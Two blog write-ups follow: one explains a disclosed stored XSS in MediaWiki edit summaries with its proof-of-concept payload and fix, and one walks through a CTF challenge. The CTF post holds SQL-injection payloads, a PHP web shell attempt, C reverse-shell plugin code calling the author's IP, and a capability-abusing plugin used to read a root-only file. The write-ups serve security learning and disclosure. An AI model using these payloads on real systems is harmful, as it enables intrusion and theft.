MediaWiki edit summary XSS write-up

 Back in January, I discovered a stored XSS vulnerability in core MediaWiki (T355538; CVE-2024-34507). Essentially by setting a specific edit summary when editing a page, you could run javascript (And take over the account of anyone viewing the edit summary, for example on the history page or recentchanges)

MediaWiki core is generally pretty good when it comes to security. There are many sketchy extensions, and sometimes there are issues where an admin might be able to run javascript, but by and large unauthenticated XSS vulns are fairly rare. I think the last one was CVE-2021-44858 from back in 2021. The next one before that was CVE-2017-8815 in 2017, which only applied to wikis configured to have a site language of certain languages (e.g. Serbian and Chinese). At least, those were the ones I found when looking through the list. Hopefully I didn't miss any. In any case, finding XSS triggerable by an unprivleged attacker in MediaWiki core is pretty hard.

So what is the bug? The proof of concept looks like this - Create an edit with the following edit summary:

[[Special:RecentChanges#%1b0000000|link1]] [[PageThatExists#/autofocus/onfocus=alert("xss\n"+document.domain)//|link2]]

This feels a bit random at first glance. How does it work?

The edit summary parser

Whenever you edit a page on MediaWiki, there is a box for your edit summary. This is essentially MediaWiki's version of a commit message.

Very little formatting is allowed in this summary. A major exception is links. You can link to other pages by enclosing the link in [[ and ]].

So this explains a little bit about the proof-of-concept - it involves 2 links. But why 2? It doesn't work with just 1. What is with the weird link targets? They are clearly abnormal, but they also don't look like typical XSS. There are no < or >, there aren't even any unclosed quotes.

Lets take a deeper look at how MediaWiki applies formatting to these edit summaries. The code where all this happens is includes/CommentFormatter/CommentParser.php.

The first thing we might notice is the following line in CommentParser::preprocessInternal: "// \x1b needs to be stripped because it is used for link markers"

In the proof of concept, the first part is [[Special:RecentChanges#%1b0000000|link1]], where %1b appears. This is a good hint that it has something to do with link markers, whatever those are.

Link markers

But what are link markers?

When MediaWiki makes a link, it needs to know whether the page being linked to exists or not, since missing pages use a red colour. The most natural way of doing this is, when encountering a link, to check in the DB whether or not the page exists.

However, there is a problem. When rendering a long page with a lot of links, we have to do a lot of DB lookups. The lookups are simple, but still on a separate (albeit nearby server). Each page to lookup involves a local network request to fetch the page status. While that is happening, MW just sits and waits. This is all very fast, but even still it adds up a little bit if you have say 500 links on a page.

The solution to this problem was to batch the queries. Instead of immediately looking up the page, MW would put a small link marker in the page at that point and carry on. Once it is finished, it would look up all the links all at once, and then do another pass to replace all the link markers.

So this is what a link marker is, just a little marker to tell MW to come back to this spot later after it figured out if all the links exist. The format of this marker is \x1B<number> (So \x1B0000000 for the first one, \x1B0000001 for the second, and so on). \x1B is the ASCII escape character.

Back to the PoC

This explains the first part of the proof of concept: [[Special:RecentChanges#%1b0000000|link1]] - the link target is a link marker. The code has a line:

                                // Fix up urlencoded title texts (copied from Parser::replaceInternalLinks)
                                if ( strpos( $match[1], '%' ) !== false ) {
                                        $match[1] = strtr(
                                                rawurldecode( $match[1] ),
                                                [ '<' => '&lt;', '>' => '&gt;' ]
                                        );
                                }


Which normalizes titles using percent encoding to use the real characters. Thus the %1B gets replaced with an actual 0x1B byte sequence. The code did try and strip 0x1B characters earlier, but at that point, it was still just %1b and did not match the check.

We now have a link with a link marker inside of it. An important note here is that Special:RecentChanges is not a normal page. It is a special page. MediaWiki knows it exists without having to consult the database, so it does not get the link marker treatment. This is important because we cannot use it as a fake link marker if it gets replaced by a real link marker.

At this stage after inserting link markers, the proof of concept becomes the following string:

<a href="/w/index.php/Special:RecentChanges#\x1B000000" title="Special:RecentChanges">link1</a> \x1B0000000

A link with a link marker inside it!

The second link

The \x1B0000000 is a stand in for [[PageThatExists#/autofocus/onfocus=alert("xss\n"+document.domain)//|link2]].

The replacement at the end is a normal replacement, and everything is fine. However there are now two replacements - there is also the replacement inside the link: href="/w/index.php/Special:RecentChanges#\x1B000000"

This is the fake link marker that we contrived to get inserted. Unlike the normal link markers, this is inside an attribute. The replacement text assumes it is being inserted as normal HTML, not as an attribute. Since it is a full link that also has quotes inside it, the two layers of quotes will interfere with each other.

Once the replacements happen we get the following mangled HTML for our proof of concept:

<a href="/w/index.php/Special:RecentChanges#<a href="/w/index.php/Test#/autofocus/onfocus=alert(&quot;xss\n&quot;+document.domain)//" title="Test">link2</a>" title="Special:RecentChanges">link1</a> <a href="/w/index.php/Test#/autofocus/onfocus=alert(&quot;xss\n&quot;+document.domain)//" title="Test">link2</a>

This obviously looks wrong, but its a bit unclear how browsers interpret it. A little known fact about HTML - /'s can separate attributes so long as no equal signs have been encountered yet. After the browser hits the second " mark, it thinks the href attribute is closed and that the remaing is some additional attributes. The browser essentially parses the above html as if it was:

<a href="/w/index.php/Special:RecentChanges#<a href=" w="" index.php="" Test#="" autofocus onfocus="alert(&quot;xss\n&quot;+document.domain)//&quot;" title="Test">link2</a>" title="Special:RecentChanges"&gt;link1</a> <a href="/w/index.php/Test#/autofocus/onfocus=alert(&quot;xss\n&quot;+document.domain)//" title="Test">link2</a>

In other words, an <a> tag, that has an attribute named autofocus and an onfocus event handler. On page load, the link is automatically focused, which triggers the javascript in the onfocus attribute to run, allowing the attacker to do what they want.

Take aways

I think the major take aways is that running Regexes over partially parsed HTML is always scary. We've had similar issues in the past, for example T110143.

The general pattern we've used to fix this and similar issues, is make sure the replacement token has special characters that would be mangled if it appeared in an unexpected context. Concretely, we added " and ' to the token, which would get escaped if placed in an attribute, and thus no longer matching and no longer being replaced.

More generally though, I think this is a good example of why even a minimal CSP policy would be helpful.

CSP is a complex standard, that can do a lot of things and has a lot of pieces. One of the things it can do, is disable "unsafe-inline" javascript. This means javascript from attributes (like onfocus) and javascript URLs. Usually this also includes inline <script> tags without a nonce, but that part is optional. A key point here, is this also generally means you cannot execute javascript via .innerHTML anymore, which is a fairly common vector for XSS via javascript.

Normally disabling unsafe-inline would be part of a broader effort to secure javascript, however its possible to take things a step at a time. This vulnerability would have been stopped just by disabling event attributes. A surprising portion of MediaWiki & extension XSS vulns [Excluding boring - an admin can change something in an unsafe way issues] involve just html attributes (or javascript: urls), which is a web feature that nobody really needs for legit reasons and is generally considered bad practise in normal usage. Even the most minimal CSP policy might really help MediaWiki's overall security posture against XSS vulns.

For more info about the vulnerability, please see the original report at https://phabricator.wikimedia.org/T355538.

Monday, October 23, 2023

CTF Writeup N1CTF 2023: ezmaria

 This weekend I participated in N1CTF. Challenges were quite hard, and other than give-away questions, I only managed to get one: ezmaria. Despite that, I still ended up in 35th place, which I think is a testament to how challenging some of these problems were. Certainly an improvement from 2021 where I came 98th. Maybe next year I'll be able to solve a problem that doesn't have "ez" in the name.



The problem

We are given a website with a clear SQL injection. It takes an id parameter, does a query, and outputs the result.

First things first, lets see what we are dealing with: 0 UNION ALL select 1, version(); reveals that this is 10.5.19-MariaDB+deb11u2. A bit of an old version, but i didn't see any immediately useful CVEs. (MariaDB is a fork of MySQL so the name "mysql" still appears all over the place even though this is MariaDB and not MySQL)

The contest organizers provided a hint: "get shell and run getcap", so presumably the flag is not in the database. Nonetheless, i did poke around information_schema to check what was in the database. There was a fake flag but no real ones.

The text of the website strongly implied that it was written in PHP, so continuing on the trend of ruling out the easy things, I tried the traditional 0 UNION ALL select 1, "<?php passthru( $_REQUEST['c'] ); ?>" INTO OUTFILE "/var/www/html/foo.php";

This gave an error message. It appears that OUTFILE triggered some sort of filter. Trying again with DUMPFILE instead bypasses the filter. However instead MariaDB gives us an error message about file system permissions. No dice. It is interesting though that I got far enough for it to be a filesystem permission error. This implies that our MariaDB user has FILE or SUPER permissions and that secure_file_priv is disabled.

The next obvious step is to try and learn a little bit more about the environment. MariaDB supports a LOAD_FILE to read files. First I tried to read environment variables out of /proc, but that didn't work. The next obvious thing was to fetch the source code of the script generating this page. Since it is implied php, /var/www/html/index.php is a good guess for the path: 0 UNION ALL SELECT load_file( "/var/www/html/index.php" ),1

Index.php


Finally a step forward. This returned the php script in question, which had several interesting things in it.
 
First off 
$servername = "127.0.0.1";
$username = "root";
$password = "123456";
$conn = new mysqli($servername, $username, $password, $dbn);

Always good to know the DB credentials. While not critical, they do become somewhat useful later. Additionally, the fact we are running as the root database user opens up several avenues of attack I wouldn't otherwise have.

// avoid attack
if (preg_match("/(master|change|outfile|slave|start|status|insert|delete|drop|execute|function|return|alter|global|immediate)/is", $_REQUEST["id"])){
    die("你就不能绕一下喵");
}

Good to know what is and isn't being filtered if I need to evade the filter later, although to be honest this didn't really come up when solving the problem.

$result = $conn->multi_query($cmd);

This is really interesting. Normally in PHP when using mysqli, you would use $conn->query(), not ->multi_query(). Multi_query supports stacked queries, which means I am not just limited to UNION ALL-ing things, but can use a semi-colon to add additional full queries including verbs other than SELECT.

The script unfortunately will not output the results or errors of these other stacked queries only the first query, which significantly slowed down solving this problem, but more on that later.

Last of all, is the secret command:
//for n1ctf ezmariadb secret cmd

if ($_REQUEST["secret"] === "lolita_love_you_forever"){
    header("Content-Type: text/plain");
    echo "\\n\\n`ps -ef` result\\n\\n";
    system("ps -ef");
    echo "\\n\\n`ls -l /` result\\n\\n";
    system("ls -l /");
    echo "\\n\\n`ls -l /var/www/html/` result\\n\\n";
    system("ls -l /var/www/html/");
    echo "\\n\\n`find /mysql` result\\n\\n";
    system("find /mysql");
    die("can you get shell?");
}


While that looks promising, lets do it!

The secret command

For space, I am going to omit some of the less important parts:

`ps -ef` result

UID          PID    PPID  C STIME TTY          TIME CMD
[..]
root          15      13  0 14:06 ?        00:00:00 su mysql -c mariadbd --skip-grant-tables --secure-file-priv='' --datadir=/mysql/data --plugin_dir=/mysql/plugin --user=mysql
mysql         20      15  0 14:06 ?        00:00:00 mariadbd --skip-grant-tables --secure-file-priv= --datadir=/mysql/data --plugin_dir=/mysql/plugin --user=mysql
[..]


`ls -l /` result

total 96
[..]
-rw-------   1 root  root    32 Oct 22 14:06 flag
-rwxr-xr-x   1 root  root    84 Sep 18 06:10 flag.sh
drwxr-xr-x   1 mysql mysql 4096 Oct 17 22:35 mysql
-rwx------   1 root  root   160 Oct 17 22:35 mysql.sh
[..]


`find /mysql` result

/mysql
/mysql/plugin
/mysql/data
/mysql/data/ibtmp1
[..]
can you get shell?


So some interesting things here.
 
Presumably the only-root-readable flag file is our target. MariaDB is running as "mysql", thus would not be able to read it. However a hint was given out to run getcap, so presumably capabilities are in play somehow. However this output does not give us any indication as to how, so I guess we'll have to figure that out later.

I was immediately curious about the flag.sh file, but it turns out to be just a script that creates the flag file and removes the flag from the environment variables.
 
An interesting thing to note here, is that mariadbd is run with some non-standard options --skip-grant-tables --secure-file-priv= --datadir=/mysql/data --plugin_dir=/mysql/plugin. We already discovered that secure-file-priv had been disabled, but it seems especially interesting when combined with setting the plugin_dir to a non-standard location that appears to be writable by mariadb. --skip-grant-tables means that MariaDB does not get user information from the internal "mysql" database. Normally in MariaDB there is a special database named mysql that stores internal information including what rights various users have - this option says not to use that database for user rights. The impact of this will become more clear later.
 
We are asked "can you get shell?", and it seems like that is a natural place to focus next.

MariaDB plugins

Setting the plugin directory to a non-standard writable directory is a pretty big hint that plugins are in play, so how do plugins work in MariaDB?

There's a variety of plugin types in MariaDB that do different things. They can add new authentication methods, new SQL functions, change the way the server operates, etc. There's also a concept of server-side vs client-side plugins. A client-side plugin is used with custom authentication schemes from programs like the mariadb command line client. Generally plugins are dynamically loaded compiled shared object (.so or .dll) files

For server side plugins, they can be enabled in config files, or dynamically via the INSTALL PLUGIN plugin_name SONAME "libwhatever.so"; SQL command. MariaDB then uses dlopen() to load the specified so file.

With all that in mind, a plan forms for how to get shell. It is still unclear where to go from there, since our shell will be running as the mysql user which won't be able to read the flag. The hope is that once we have a shell we can investigate the server more thoroughly and find some way to escalate privileges. In any case, the plan is: Write a plugin that spawns a reverse shell, upload the plugin via the SQL injection using INTO DUMPFILE, enable the plugin and catch the shell with netcat.

Writing a plugin

MariaDB already comes with a lot of plugins, so instead of writing one from scratch I decided to just modify an existing one.

We can download the sources for the debian version of mariadb at https://salsa.debian.org/mariadb-team/mariadb-10.5.git.

I could implement the needed commands in the plugin initialization function, the way a proper plugin would, but it seemed easier to just add a constructor function. This will get executed as soon as MariaDB calls dlopen(), so even if something is wrong with the plugin and MariaDB refuses to load it - as long as it can be linked in, my code will still run.

With that in mind, I added the following to the middle of plugin/daemon_example/daemon_example.cc:
 
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
 
__attribute__((constructor))
void shell(void){
  if (!fork() ) {
    int port = 8080;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;       
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("167.172.208.75");

    connect(sockt, (struct sockaddr *) &revsockaddr,
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, {NULL} );
  }     
}


The __attribute__((constructor)) tells gcc that this function should run immediately upon dlopen(). It then opens a connection to 167.172.208.75 (my IP address) on port 8080, connecting stdin, stdout, and stderr to the opened socket, and executing /bin/sh thus making a remotely accessible shell. On my own computer I will be running nc -v -l -p 8080 waiting for the connection. Once it connects I will have a shell to the remote server.

I run cmake and make and wait for things to compile. Eventually they do, and we have a nice shiny libdaemon_example.so.
 

Installing the plugin

I convert this to base64, and prepare in a file named data containing: 0 UNION ALL SELECT from_base64( "...libdaemon_example.so as base64" ) INTO DUMPFILE "/mysql/plugin/libdaemon_example.so"; and upload it via curl 'http://urlOfChallenge' --data-urlencode id@data.
 
We can confirm it got there safely, by doing a query: 0 UNION ALL md5(load_file( "/mysql/plugin/libdaemon_example.so" ) ); and verifying the hash matches.

The hashes match, so its time to put this into action. I give the SQL: 0; INSTALL PLUGIN daemon_example SONAME "libdaemon_example.so";

And wait in eager anticipation for netcat to report a connection, but the connection never comes.

----

This is where things would be much simpler if our sql injection actually reported errors from stacked queries. Without that we just have to guess what went wrong, and guess I did. Figuring out why it didn't work took hours.

Initially when testing locally it worked totally fine, using the same version of MariaDB with the same options. I even tried on a different version of MariaDB I had installed, where MariaDB refused to load the plugin due to an API mismatch, but nonetheless my code still ran because it was in a constructor function.
 
After bashing my head against it for several hours,I eventually noticed that my file structure looked different than what it did on the server. On my local computer there was a "mysql" database (In the sense of a collection of tables, not in the sense of the program), where the server only had the ctf and information_schema databases. When compiling mariadb locally, I had run an install script that had created the mysql database automatically.

Getting rid of the mysql database, I was able to reproduce the problem locally, and got a helpful error message. Turns out, INSTALL PLUGIN uses the mysql.plugins table internally and refuses to run if it isn't present. I dug around the MariaDB sources, and found scripts/mysql_system_tables.sql which had a definition for this table.

This also explains why the --skip-grants-table option was set. MariaDB will abort if the mysql.global_priv table is not present without this option. Hence the option is needed for MariaDB to even run in this setup.

With that in mind, i gave the following commands to the server to create the missing plugins table:

 0;
 CREATE database mysql;
 USE mysql;
 CREATE TABLE IF NOT EXISTS plugin ( name varchar(64) DEFAULT '' NOT NULL, dl varchar(128) DEFAULT '' NOT NULL, PRIMARY KEY (name) ) engine=Aria transactional=1 CHARACTER SET utf8 COLLATE utf8_general_ci comment='MySQL plugins';

Now with the mysql.plugin existing, lets try this again:

0; INSTALL PLUGIN daemon_example SONAME "libdaemon_example.so";
 
I then look over to my netcat listener:
 
Listening on 0.0.0.0 8080
Connection received on 116.62.19.175 26740
pwd
/mysql/data
 
We have shell!

Exploring the system

Alright, we're in. Now what?

The contest organizers gave a hint saying to run getcap, so that seems like a good place to start:

getcap -r / 2> /dev/null
/usr/bin/mariadb cap_setfcap+ep

Well that is something. Apparently the MariaDB command line client (not the server) has the setfcap capability set.

What are capabilities anyhow?

While I have certainly heard of linux capabilities before, I must admit I wasn't very familiar with them. So what are they?

Capabilities are basically a fine-grained version of "root". Each process (thread technically) has a certain set of capabilities, which grant it rights it wouldn't normally otherwise have.

For example, if you are running a web server that needs to listen on port 80, instead of giving it full root rights, you could give the process CAP_NET_BIND_SERVICE capabilities, which allows it to bind to port 80 even if it is not root. Traditionally you need root to bind to any port below 1024.

There are a variety of capabilities that divide up the traditional things that root gives you, e.g. CAP_CHOWN to change file owners or CAP_KILL to send signals and so.

Sounds simple enough, but the rules on how capabilities are transferred between processes are actually quite complex. Personally I found most of the docs online a bit confusing, so here is my attempt at explaining:
 
Essentially, each running thread has 5 sets of capabilities, and each executable program has 2 sets + 1 special bit in the filesystem. What capabilities a new process will actually have and which ones are turned on is the result of the interplay between all these different sets.

The different capabilities associated with a thread are as follows (You can view the values for a specific running process in /proc/XXX/status):
  • Effective: These are the capabilities that are actually currently used for the thread when doing permission checks. You can think of these as the capabilities that are currently "on".
  • Permitted: These are the capabilities that the thread can give itself. In essence, these are the capabilities that the thread can turn on, but may or may not currently be "on" (effective). If a capability is in this set but not the effective set, it won't be used for permission checks at present but a thread is capable of enabling it for permission checks later on with cap_set_proc().
  • Inheritable: These are the capabilities that can potentially be inherited by new processes after doing execve. However the new process will only get these capabilities if the file being executed has also been marked as inheriting the same capability.
  • Ambient: This is like a super-version of inheritable. These capabilities will always be given to child processes after execve even if the program is not explicitly marked as being able to inherit them. It will inherit them into both its effective set and its permitted set, so they become "on" by default.
  • Bounding: This is more like a max limit. Anything not in this list can be never given out or gained. In a normal system, you probably have all capabilities in this set, but if you wanted to setup a restricted system some capabilities might be removed from here to ensure it is impossible to ever gain them back.
In addition to threads having capabilities, executable files on the file system also can have capabilities. This is somewhat akin to how SUID works (although unlike SUID this is not marked in the output of ls in any way). Files have 2 sets of capabilities and 1 special flag. These can be viewed using getcap:
  • Permitted: These are the capabilities that the executable will get when being executed. The process will get all of these capabilities (except those missing from the bounding set) even if the parent process does not have these capabilities. Its important to remember that the file permitted set is a different concept from the permitted set of a running process.
  • Inheritable: These are the capabilities the executable will get if the running parent process also has them in its inheritable set.
  • Effective flag: This is just a flag not a set of capabilities. This controls how the new process will gain capabilities. If it is off, then the new capabilities will go in the thread's permitted set and won't automatically be enabled until the thread itself enables them by adding to its own effective set. If this flag is on, then the new capabilities for the thread go in the thread's effective set automatically (i.e. they start in an "on" state).
Generally capabilities for files are displayed as capability_name=eip where e, i and p, denote what file set the capability is in (e is a flag so has to be on for all or none of the capabilities).
 
To summarize file system capabilities: "permitted" are the capabilities the process automatically gets when started regardless of parent process, "inherited" are the ones that they can potentially gain from the parent process but generally won't get if the parent process doesn't have them as inheritable, and effective controls if the capabilities are on by default or if the process has to make a syscall before they become turned on.

This is a bit complex, so lets consider an example:

Consider an executable file named foo that has cap_chown in its (filesystem) inherited set and cap_kill in its (filesystem) permitted set.
 
 sudo setcap cap_chown=+i\ cap_kill=+p ./foo
 
This means when we execute it, the foo process will definitely have cap_chown in its permitted set regardless  (As long as it is in the bounding set of the parent process). It might have cap_kill in its permitted set, but only if the parent process had cap_kill in its inheritable set. However its effective set will be empty (assuming no ambient capabilities are in play) until foo calls cap_set_proc(). If instead the e flag was set, then these capabilities would immediately be in the effective set without having to call cap_set_proc. Regardless if the foo process execve's some other child process where the file being executed is not marked as having any capabilities, the child would not inherit any of these capabilities foo has.


I've simplified this somewhat, see capabilities(7) man page for the full details.

MariaDB's capabilities

With that in mind, lets get back the problem at hand.

/usr/bin/mariadb cap_setfcap+ep

So MariaDB client has the setfcap capability. It is marked effective and permitted, which means the process will always get it and have it turned on by default when executed.

What is cap_setfcap? According to the manual, it allows the process to "Set arbitrary capabilities on a file."

Alright, that sounds useful. We want to read /flag despite not having permission to, so we can get mariadb with its CAP_SETFCAP capability to give another executable CAP_DAC_OVERRIDE capability. CAP_DAC_OVERRIDE means ignore file permissions, which would allow us to read any file.

My initial thought was to use the \! operator in the mariadb client, which lets you run shell commands, to run setcap(8). However it quickly became obvious that this wouldn't work. Since these permissions are only in the permitted & effective sets, they are not going to be inherited by the shell. Even if they were in the inheritable set, the shell would also have to have its executable marked as inheriting them in order for them to get inherited. Thus any subshell we make is unprivileged.

We need mariadb to execute our commands inside its process without running execve. The moment we execve we lose these capabilities.

Luckily, we can basically use the same trick as last time. In addition to mariadbd server supporting plugins, mariadb client also supports plugins. These are used for supporting custom authentication methods.
 
In MariaDB users can be authenticated via plugins. These server side authentication plugins can also have a client side requirement. If you try and log in as a user marked as using one of these plugins, the MariaDB client will automatically try and load (dlopen()) the relevant plugin when you try and log in as that user.

I again modified an existing one instead of trying to make my own. I decided to go with the dialog_example plugin from the MariaDB source code.

The server side part of this is from plugin/auth_examples/dialog_examples.c. The only change i made was to switch mysql_declare_plugin(dialog) to maria_declare_plugin(dialog) and set the stability to MariaDB_PLUGIN_MATURITY_STABLE (previously was 0). This was needed for mariadb to load the plugin in the default configuration. For clarity sake, although the name of the file is dialog_examples, the plugin's actual name is "two_questions".
 
After compiling, this generated a dialog_examples.so file which I uploaded to the server in the same fashion as before.

The client side part of the plugin is from libmariadb/plugins/auth/dialog.c. I added the following code:

#include <sys/capability.h>

#define handle_error(msg) \
   do { perror(msg); } while (0)

__attribute__((constructor))
void foo(void) {
        cap_t cap = cap_from_text( "cap_dac_override=epi" );
        if (cap == NULL) handle_error( "cap_from_text" );
        int res = cap_set_file( "/mysql/priv", cap );
        if (res != 0 ) handle_error( "cap_set_file" );
}


I also modified libmariadb/plugins/auth/CMakeLists.txt to add LIBRARIES cap to the REGISTER_PLUGIN directive to ensure it is linked with libcap.

This code esentially says, when the plugin is loaded, change the file capabilities of /mysql/priv to be cap_dac_override=epi (The i is probably unnecessary) thus allowing that program to read all files.

Compiling this made libmariadb/dialog.so which I uploaded to the server in the usual fashion. I also ran cp /bin/cat /mysql/priv to create the target for our plugin's capability modifications.

Setting things up to run the plugin

Now that these pieces are in place, we still have to convince the mariadb client to run our plugin. This comes down to trying to login to a mariadb server that needs the dialog/two_questions authorization method.
 
Normally this would be pretty easy, just run CREATE USER. However, that uses the grant table which is explicitly disabled.
 
At first I thought I was going to need to somehow get rid of this option on the server (Or i suppose just use a server on a different host. I didn't think of that at the time, but it probably would have been simpler). However, it turns out, even if the server starts without the grants table enabled you can enable it after the fact by running FLUSH PRIVILEGES.

Of course, these tables don't even exist, and the normal methods of adding entries (CREATE USER command) won't work until they do. Thus we have to manually create the table ourselves and make appropriate entries.
 
I log in using the mariadb command line client from the shell, as this is a lot easier than the sql-injection, and run the following commands to set this all up:
 
$ mariadb -u root -h 127.0.0.1 -p123456 -n

use mysql;
source /usr/share/mysql/mysql_system_tables.sql; -- install defaults for mysql db

INSTALL PLUGIN two_questions SONAME "dialog_examples.so";

INSERT INTO `global_priv` VALUES ('%','foo','{\"access\":1073741823,\"version_id\":100521,\"plugin\":\"two_questions\",\"authentication_string\":\"*00A51F3F48415C7D4E8908980D443C29C69B60C9\",\"password_last_changed\":1698000149}' );

INSERT INTO `global_priv` VALUES ('%','root','{\"access\":1073741823,\"version_id\":100521,\"plugin\":\"mysql_native_password\",\"authentication_string\":\"**6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9\",\"password_last_changed\":1698000149}' );

FLUSH PRIVILEGES;

 
In summary - I use the -n option to ensure mariadb flushes output since we don't have a pseudo-terminal, output will show up way too late if we don't do this.

I switch to the special mysql database which we created earlier. I already created the plugin table, but now I use SOURCE to create the other defaults for the mysql database. The mysql_system_tables.sql file was already present on the server. Then we insert a root user so we don't lose access, along with a foo user that uses our plugin.

Once we run FLUSH PRIVILEGES the new permissions take affect.

We now exit this and try logging in as foo, being sure to specify the appropriate plugin directory:
 
mysql -u foo2 -h 127.0.0.1 -n --plugin-dir=./plugin

The login doesn't work, but the plugin seems to have been executed. We had previously copied cat to /mysql/priv. If everything worked right, it should now be able to read any file on the system regardless of permissions:

/mysq/priv /flag
n1ctf{9a81f84cc7a3064e34800c35}


Success!

Conclusion

This was a fun problem. It taught me some of the internals of mysql and was a good excuse to finally commit the time to understanding how linux capabilities actually work.

The biggest challenge was figuring out the mysql.plugins table was needed to load a plugin. It probably would have been a lot less frustrating of a problem if error messages from stacked queries were actually output.

Nobody solved this problem until fairly late in the competition, but then about 8 teams did. The ctf organizers did release a hint that capabilities were involved. I wonder if many teams just didn't think to check for that as giving mariadb random capabilities it can't even use is not something that is likely to happen in real life, and capabilities are much less famous than SUID binaries.

Perhaps teams didn't get that far and simply saw from the output of the "secret" website command that some sort of unknown privilege escalation was necessary, figuring it might be some really involved thing and decided to work on other problems instead. In a way I'm kind of surprised that getcap wasn't output from the secret command to give people more of a direct hint - other more obvious things were after all. For that matter, it is kind of weird how ls doesn't mark files with capabilities in any special way like a SUID binary would be. I know its not stored in the traditional file mode, but nonetheless I found it a little surprising how hidden from traditional cli tools it is that capabilities are in play.